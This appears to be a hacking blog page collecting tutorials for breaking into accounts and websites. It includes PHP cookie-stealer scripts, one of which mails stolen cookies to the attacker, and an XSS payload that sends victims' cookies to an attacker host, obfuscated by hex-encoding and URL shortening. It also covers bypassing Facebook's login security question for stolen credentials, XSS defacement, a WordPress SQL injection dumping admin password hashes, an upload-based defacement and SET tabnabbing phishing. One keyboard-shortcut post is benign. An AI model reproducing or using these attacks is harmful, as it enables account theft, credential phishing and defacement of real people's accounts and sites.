Advertise Here

How to Login in Facebook without Getting the Security Question 100% work




You got someone facebook id and password. If you try to login to that account from your your system, it will ask to answer security question. You can bypass this security.

Requirments:
slave IP address

* and enter the IP address.
* It will show the country of slave.
* Now visit:
* Find the proxy IP address based on the slave's Counry.
* Set the proxy IP in mozilla
* Now login to facebook with id you got. you won't get Security 
Question now.
[Read More...]


Hack cookie XSS Method




Requirements:
  • A cookie Stealer code : Here is the simple Cookie Stealer code: Cookie stored in File:
  • <?php
    $cookie = $HTTP_GET_VARS["cookie"];
    $steal = fopen("cookiefile.txt", "a");
    fwrite($steal, $cookie ."\\n");
    fclose($steal);
    ?>
    $cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.

    $steal = fopen("cookiefile.txt", "a"); This open the cookiefile in append mode so that we can append the stolen cookie.

    fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file.

    fclose($steal); close the opened file.

    Another version: Sends cookies to the hacker mail  
    <?php
    $cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@mailprovider.com", "Stolen Cookies", $cookie);
    ?>
    The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".

    Third Version
    <?php
    function GetIP()
    {
        if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
            $ip = getenv("HTTP_CLIENT_IP");
        else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
            $ip = getenv("HTTP_X_FORWARDED_FOR");
        else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
            $ip = getenv("REMOTE_ADDR");
        else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
            $ip = $_SERVER['REMOTE_ADDR'];
        else
            $ip = "unknown";
        return($ip);
    }
    function logData()
    {
        $ipLog="log.txt";
        $cookie = $_SERVER['QUERY_STRING'];
        $register_globals = (bool) ini_get('register_gobals');
        if ($register_globals) $ip = getenv('REMOTE_ADDR');
        else $ip = GetIP();

        $rem_port = $_SERVER['REMOTE_PORT'];
        $user_agent = $_SERVER['HTTP_USER_AGENT'];
        $rqst_method = $_SERVER['METHOD'];
        $rem_host = $_SERVER['REMOTE_HOST'];
        $referer = $_SERVER['HTTP_REFERER'];
        $date=date ("l dS of F Y h:i:s A");
        $log=fopen("$ipLog", "a+");

        if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
            fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
        else
            fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
        fclose($log);
    }
    logData();
    ?>
     The above Cookie stealer will store the following information:
    • Ip address
    • port number
    • host(usually computer-name)
    • user agent
    • cookie
  • Free Web hosting service
  • Basic Knowledge about XSS
  • Basic Knowledge about Computer Cookies
Cookie stealing is the process of exploiting the XSS vulnerability (Non-persistent/persistent) and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts.

    Step 1: Creating Cookie Stealer PHP file
    Get the Cookie stealer from the link i mentioned.  In that post, i have explained three versions of cookie stealer.  We are going to use the third version.
    • Copy the code.
    • Open Notepad and paste the code
    • Save the file with .php extension
      Eg: Stealer.php
    Now create New file and save it as log.txt (leave it as blank). Don't change the name , this is the file name what we give in php file.

    Now you will have two files;
    1. Stealer.php
    2. log.txt

    What these two files do exactly?
    The above Stealer.php file get ip address,cookie and stores the data in log.txt file.
    The log.txt has cookies , ip address details.

    Step 2:  
    Register in a free web-hosting service and login into your cpanel.
    Now open the File Manager in cpanel.
    Upload the Stealer.php and log.txt to root folder or public_html folder.

    Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

    Step 3: Exploiting the XSS Vulnerability
    So Far , we have sharpened our saw.  Now we are going to use it.
    Once you set up everything and find a Vulnerable site,then inject the following code in the Vulnerable sites.

    <script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>
    For example:
    hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

    Cookie Stealing with Non-Persistent vs Persistent XSS:
    Persistent: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it.  It will be shown to all users.  So attackers don't need to send any link to others.  Whoever visit the page, they will be vicim.

    Non-Persistent:
    In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie.  Most of sites are vulnerable to Non-persistent XSS .

    In Non-persistence, Attackers will send the injected link victims.
    For example:
    hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

    The above link is clearly shows the scripts.  Hackers can Hex-encode this script  so that victim can't see the script.
    For Example:
    hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e
    Still , the link look long. The attacker use one more trick to hide the long url i.e url shortening sites. There are lot of sites that shorten the long url into tiny url.

    For example:
    hxxp://www.tinyexample.com/twrwd63

    Once the victim follow the link, his cookie will be stored in log.txt file.

    How to be Secure from this attack?
    • Use No-Script Addon. This is best protection to stay away from XSS 
    • Never Click the Shorten url
    • Sometime you may want to follow the shorten link.  If so, then clear all cookies in your browser and visit through Proxy or VPN(it will hide your ip)
    • (Later We will cover security tips for site admin , so stay tuned)
    [Read More...]


    Website deface method XSS tutorial



    Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..!

    Script for chaning the background Color of a website:
    <script>document.body.bgColor="red";</script>


    Script for chaning the background image of a website:
    <script>document.body.background="http://your_image.jpg";</script>

    Defacement Page with Pastehtml:
    First of all upload some defacement page(html) to pastehtml.com and get the link.

    When you find a XSS vulnerable site, then insert the script as :
    <script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

    This script will redirect the page to your pastehtml defacement page.

    Note: You can deface only persistent XSS vulnerable sites.
    [Read More...]


    Hack WordPress Blog in easy way full tutorial




    In this tutorial I am going to show you how to hack wordpress blog in easy was so just follow the simple steps.

    1. Open google and search inurl:"fbconnect_action=myhome"
    2. Now open any link from the search result .

    3. After opening the link just change this part of the URL ?fbconnect_action=myhome&userid= with this
    ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z​0mbyak,7,8,9,10,11,12+from+wp_users--

    after that just hit enter you will see the admin id and hash (see the bellow snapshot ) now just decrypt the hash with md5 cracker and you have done !
    wordpress blog 2
    [Read More...]


    Create your own keyboard shortcut key to open a program





    In this tutorial I am going to show you how to make your own shortcut key to open the program in faster way. Using this technique your speed will increase and you can make your own keyboard shortcut Just follow the simple steps.
    1. go to start and right click on the program which you want to create a shortcut key
    2. go to properties (see the bellow snapshot)
    create your own shortcut
    3. Now Click on shortcut key and just press ctrl and press any key ( from a to z ).
    create your own shortcut 2
    And hit ok and you have done !
    [Read More...]


    WordPress Remote File Upload Vulnerability with Asset Manager Hack Web sites




    In WordPress we can upload our deface page using Remote File Upload Vulnerability with Asset Manager. Asset Manager is a plugin that allows you to upload your files Just simply follow the simple steps to hack the wordpress website.
    1. Open google and search inurl:Editor/assetmanager/assetmanager.asp2. Now open any result you will found look like bellow snapshot.
    3. Just click on browse and upload your deface page.
    Demo: Asset Manager Deface page
    [Read More...]


    facebook hack using backtrack




    Now in this tutorial I am going to show you how to hack facebook account using backtrack 5. So just follow the simple steps.
    Open your backtrack 5’s terminal and type cd /pentest/exploits/set
    Backtrack5 1
    Now Open social Engineering Tool kit (SET) ./set
    backtrack5 2
    Just hit ENTER and SET will Open , Now just select 1st option (1 Social-Engineering Attacks) and hit enter after that 2nd number (just type 2 as shown in snapshot)
    backtrack5 3
    Now Just select 4th Option “Tabnabbing Attack Method” and Hit ENTER
    backtrack5 4
    Then select 2nd option “Site Cloner” and Hit ENTER
    backtrack5 5
    Now here you need to add the URL of Facebook (if you want to hack gmail then just add the gmail’s URL)
    backtrtack5 6
    Now just hit the enter.
    backtrack5 6
    Open new terminal and just type ifconfig and hit ENTER
    backtrack5 9
    Now just copy this IP address and open it in Browser.
    backtrack5 7
    Now here I am just typing test email and password to see whether it works or not.
    backtrack5 8
    Now just hit enter and switch back to our terminal and we found the Email and password !
    backtrack5 10
    This tutorial is just educational purpose only.
    [Read More...]


    what is my ip address?
    Click here to get admin
    ^_^

    UnDeRgRoUnD

    Return to top of page Copyright © 2012-20** | Special Editing by Fahim Ferdous Riyan Filemela Web team